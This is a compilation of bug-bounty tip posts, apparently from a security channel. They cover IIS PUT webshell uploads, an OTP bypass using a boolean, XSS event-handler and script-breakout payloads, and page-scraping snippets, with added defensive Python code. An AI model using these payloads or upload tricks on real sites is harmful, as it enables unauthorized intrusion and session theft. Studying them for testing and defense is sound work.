🔎 ASP.NET request validation rejects the angle brackets with "A potentially dangerous Request.Path value was detected"; with custom errors disabled, that error page also leaks the framework version, a stack trace and physical paths.

⚡️ Remote Code Execution – File Uploads via PUT
1️⃣ Check which methods are allowed (read the Allow: header in the response):

curl -X OPTIONS https://target.com -v

2️⃣ If PUT is allowed (on IIS that usually means WebDAV is enabled with write access), upload a WebShell:

.aspx shell for RCE
web.config for config injection

If PUT works for harmless extensions but is rejected for .aspx, uploading a .txt and renaming it with a WebDAV MOVE request is the classic way to get an executable extension.

🚀 If successful? You now have web server access as the application pool identity; escalating from there is a separate step.


📢 Stay updated with @cybersecplayground for more bug bounty tips, hacking techniques, and security research!

#BugBounty #CyberSec #IIS #WebShell #Pentesting #EthicalHacking #Infosec
🚀 Bypassing OTP in an Unexpected Way!

🛑 Many applications fail to properly validate OTP inputs, allowing simple logical bypasses.

🔥 Trick: Replace OTP value with true
🔍 Original Request:
{
"OTP": "11111"
}

⚡️ Modified Request (Bypass Attempt):
{
"OTP": true
}

🔎 Why Does This Work?
Weak backend validation – Some apps check that an OTP field is present but never check its type or format.
Loose type handling – A boolean survives JSON parsing, and with loose comparison (PHP's ==, where "482913" == true is true) it matches any non-empty stored code. In JavaScript true == "482913" is false, but a bare truthiness check still passes.
Flawed comparison logic – If the app does if (OTP) before (or instead of) the real comparison, true is considered valid!


🎯 How to Test?
1️⃣ Try submitting true instead of an actual OTP.
2️⃣ Test other variations (false, null, 0, {}) to see how the backend reacts.
3️⃣ Check response behavior – Does it accept or reject the request?
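Vulnerable and hardened OTP checks side by side, as an added example that is not from the post. The vulnerable handler models the truthiness check and PHP-style loose comparison described above; the stored code 482913 and the JSON bodies are constructed for the demo.

```python
import hmac
import re

OTP_FORMAT = re.compile(r"[0-9]{6}")


def loose_equals(a, b):
    """Emulates PHP-style loose '==': a boolean on either side collapses the
    comparison to truthiness, so "482913" == true is true."""
    if isinstance(a, bool) or isinstance(b, bool):
        return bool(a) == bool(b)
    return a == b


def verify_otp_vulnerable(body, stored_otp):
    """Presence check plus loose comparison: {"OTP": true} passes."""
    otp = body.get("OTP")
    if not otp:  # only "is there something truthy in the field?"
        return False
    return loose_equals(otp, stored_otp)


def verify_otp(body, stored_otp):
    """Type check, format check, then constant-time comparison.

    Anything that is not a six-digit string is rejected before any compare,
    so booleans, numbers, objects and null never reach the comparison."""
    otp = body.get("OTP")
    if not isinstance(otp, str) or not OTP_FORMAT.fullmatch(otp):
        return False
    return hmac.compare_digest(otp.encode(), stored_otp.encode())


# Constructed requests: the stored code would normally live in the user's session
STORED = "482913"
REQUESTS = [
    {"OTP": "482913"},  # the legitimate submission
    {"OTP": "111111"},  # wrong code
    {"OTP": True},      # the bypass attempt from the post
    {"OTP": 482913},    # right digits, wrong type (a JSON number)
    {},                 # field missing
]

if __name__ == "__main__":
    for body in REQUESTS:
        print(body, "vulnerable:", verify_otp_vulnerable(body, STORED),
              "hardened:", verify_otp(body, STORED))
```

The hardened version also needs an attempt counter and expiry on the stored code in a real deployment; a six-digit space is small enough to brute-force if the server keeps answering.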


🚀 If it works? You’ve bypassed OTP authentication!

📢 Stay updated with @cybersecplayground for more bug bounty techniques, hacking tips, and security research!

#BugBounty #CyberSecurity #OTPBypass #Pentesting #EthicalHacking #Infosec
🚀 Top JavaScript Event Handlers for XSS Exploitation

When testing for Cross-Site Scripting (XSS), certain event handlers can be used to trigger payloads. Here’s a list of the most useful ones:

🎯 Mouse & Click Events:
🔹 onmouseover – Triggers when hovering over an element
🔹 onmousedown – Fires when mouse button is pressed
🔹 onmouseup – Fires when mouse button is released
🔹 onclick – Triggers when clicking on an element
🔹 ondblclick – Triggers when double-clicking


💥 Example XSS Payload (fires without any interaction, unlike the mouse handlers above, which need the user to hover or click a visible element):
<img src=x onerror=alert('XSS')>


🎯 Keyboard Events:
🔹 onkeydown – Fires when a key is pressed
🔹 onkeypress – Fires when a key that produces a character is pressed (deprecated, but still supported by browsers)
🔹 onkeyup – Fires when a key is released


💥 Example XSS Payload (onfocus is a focus event, not a keyboard one; the autofocus attribute makes it fire on page load instead of waiting for the user to tab into the field):
<input type="text" onfocus=alert("XSS") autofocus>


🎯 Form Events:
🔹 onsubmit – Triggers when a form is submitted
🔹 onreset – Fires when a form is reset
🔹 onfocus – Fires when an element gains focus
🔹 onblur – Fires when an element loses focus


💥 Example XSS Payload:
<form onsubmit=alert("XSS")>
<input type="submit">
</form>


🎯 Media Events:
🔹 onerror – Triggers when an error occurs (🔥 Most common in XSS)
🔹 onload – Triggers when an element loads
🔹 onplay – Triggers when a video starts playing


💥 Example XSS Payload:
<img src="invalid.jpg" onerror=alert('XSS')>


🎯 Miscellaneous Events:
🔹 onhashchange – Fires when the URL hash changes
🔹 onmessage – Fires when the window receives a postMessage (the classic source of DOM-based XSS when the handler trusts the message without checking its origin)
🔹 oncut, oncopy, onpaste – Triggers when interacting with clipboard


💥 Example XSS Payload (fires once the fragment changes, e.g. after the page is opened with #x appended to its URL):
<body onhashchange=alert('XSS')>


🔥 Pro Tip for Bug Bounty Hunters!
Try event handlers in different HTML tags (e.g., <svg>, <iframe>, <input>)
Test with various encoding methods (URL encoding, base64, HTML entities)
Bypass filters by using double encoding or breaking syntax


📢 Stay updated with @cybersecplayground for XSS payloads, bug bounty tips, and hacking techniques!

#XSS #BugBounty #WebSecurity #CyberSecurity #EthicalHacking #Pentesting #Infosec
🚀 Reflected XSS Found in a Popular VDP!

🔍 Vulnerability: A reflected Cross-Site Scripting (XSS) flaw was discovered in a well-known Vulnerability Disclosure Program (VDP).

🔥 Payload Used:
'});alert(document.cookie);</script>

🎯 How It Works?
The application reflects unsanitized user input inside a JavaScript string within a <script> block.
The '}) closes the string, the object literal and the function call, the ; ends the statement, the injected alert() runs, and </script> closes the block so the remainder of the original script is rendered as HTML instead of executed.
alert(document.cookie) only displays the cookies as proof of execution; a real attacker would send them (or act with the victim's session) to their own server, which is why the finding is rated as potential account takeover. Cookies flagged HttpOnly are not readable this way, but the session can still be used from the injected script.


🛠 Steps to Reproduce:
1️⃣ Find a parameter that reflects user input inside a <script> tag.
2️⃣ Inject the payload:

target.com/search?q='});alert(document.cookie);</script>

3️⃣ If the page executes the JavaScript, XSS is successful! 🚀

🔒 How to Prevent?
Use Content Security Policy (CSP) to block inline JavaScript execution.
Sanitize user input before reflecting it in responses.
Escape special characters to prevent breaking out of scripts.
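Context-aware output encoding, added here as an example rather than taken from either post; it serves this reflected-XSS case (a JavaScript string context) and the HTML-context payload from the earlier RXSS post, and the same encoding neutralises the custom-tag payload from the AWS WAF post. html.escape handles text and quoted attributes, while a JavaScript string needs a JSON literal with < escaped so that a value can never contain a working </script>. The surrounding markup and the function name search() are assumed.

```python
import html
import json


def render_cell_vulnerable(q):
    """Reflects q straight into HTML, as the vulnerable search page does."""
    return f"<table><tr><td><a href='#'>{q}</a></td></tr></table>"


def render_cell(q):
    """HTML body context: escape <, >, & and both quote characters."""
    return f"<table><tr><td><a href='#'>{html.escape(q, quote=True)}</a></td></tr></table>"


def render_attr(q):
    """Attribute context: always quote the attribute AND escape quotes inside it,
    otherwise a value can end the attribute and add an onmouseover of its own."""
    return f'<input name="q" value="{html.escape(q, quote=True)}">'


def render_script_vulnerable(q):
    """JS string context built by concatenation: ' and </script> break out."""
    return "<script>search({q: '" + q + "'});</script>"


def render_script(q):
    """JS string context: emit a JSON string literal and escape '<' so that
    '</script>' inside the value can never close the script block."""
    literal = json.dumps(q).replace("<", "\\u003c")
    return "<script>search({q: " + literal + "});</script>"


# Payloads quoted on this page
RXSS_PAYLOAD = "\"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//"
JS_CTX_PAYLOAD = "'});alert(document.cookie);</script>"
ATTR_PAYLOAD = '" onmouseover=alert(1) x="'


def demo():
    """Render every payload through the vulnerable and the encoded path."""
    return {
        "html_vulnerable": render_cell_vulnerable(RXSS_PAYLOAD),
        "html_safe": render_cell(RXSS_PAYLOAD),
        "attr_safe": render_attr(ATTR_PAYLOAD),
        "script_vulnerable": render_script_vulnerable(JS_CTX_PAYLOAD),
        "script_safe": render_script(JS_CTX_PAYLOAD),
    }


if __name__ == "__main__":
    for label, markup in demo().items():
        print(f"{label}:\n  {markup}")
```

Note what the encoded outputs still contain: the word alert, the word script, even the full payload text. Encoding does not remove content, it makes the browser parse it as data in the context it was emitted into, which is why it holds up against payloads that no blocklist anticipated.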


📢 Follow @cybersecplayground for more bug bounty techniques, payloads, and hacking insights!

#XSS #BugBounty #CyberSecurity #VDP #WebSecurity #EthicalHacking #Pentesting
🚀 Extract All Images from a Web Page

Want to quickly list all images on a website? Use this JavaScript snippet in your browser’s DevTools or as a bookmarklet to extract image URLs instantly!

🔥 JavaScript Code:
javascript:console.log('Images on this Page:\n' + Array.from(document.querySelectorAll('img')).map(img => img.src).join('\n'));


🎯 How It Works?
document.querySelectorAll('img') selects all <img> elements on the page.
.map(img => img.src) extracts the source URLs of the images.
.join('\n') formats the output for easy readability in the console.


📌 How to Use?
1️⃣ Open the browser DevTools (F12 → Console).
2️⃣ Copy and paste the JavaScript code into the console.
3️⃣ Press Enter to list all image URLs on the page!


🔹 Bonus: Save it as a bookmarklet for quick access!
👉 Bookmark Name: Extract Images
👉 URL:
javascript:(function(){console.log('Images on this Page:\n' + Array.from(document.querySelectorAll('img')).map(img => img.src).join('\n'));})();


📢 Stay ahead in bug bounty & web scraping! Follow @cybersecplayground for more hacking tips & automation tricks!

#BugBounty #WebScraping #EthicalHacking #JavaScript #CyberSecurity
Here’s an upgraded version of the image-extraction script above; it also collects videos (mp4), JavaScript files (script) and links (a tags) from the page:

(() => {
  try {
    // [label, selector, property] groups; the property holds the resolved absolute URL
    const groups = [
      ['IMG', 'img', 'src'],
      ['MP4', 'video source', 'src'],
      ['JS', 'script[src]', 'src'],
      ['LINK', 'a[href]', 'href'],
    ];
    const media = groups
      .flatMap(([label, selector, prop]) =>
        Array.from(document.querySelectorAll(selector))
          .map(el => el[prop])
          .filter(url => typeof url === 'string' && url) // drop empty src/href values before labelling
          .map(url => `[${label}] ${url}`))
      .map((entry, index) => `${index + 1}: ${entry}`); // number once, after merging, so the count doesn't restart per type

    if (media.length === 0) {
      console.log("No images, videos, JS files, or links found on this page.");
    } else {
      console.log("📸🎥📜🔗 Extracted Media & Links:\n" + media.join("\n"));
    }
  } catch (error) {
    console.error("Error extracting data:", error);
  }
})();

🔥 New Features:
Extracts Images (img), MP4 Videos (video source), JavaScript Files (script[src]), and Links (a[href])
Labels each entry as [IMG], [MP4], [JS], or [LINK] for easy identification
Filters out empty src/href values before labelling and numbers the merged list once, so the output is clutter-free and the count is continuous
Error handling ensures smooth execution

📢 Stay ahead in bug bounty & web scraping! Follow @cybersecplayground for more hacking tips & automation tricks!

#BugBounty #WebScraping #EthicalHacking #JavaScript #CyberSecurity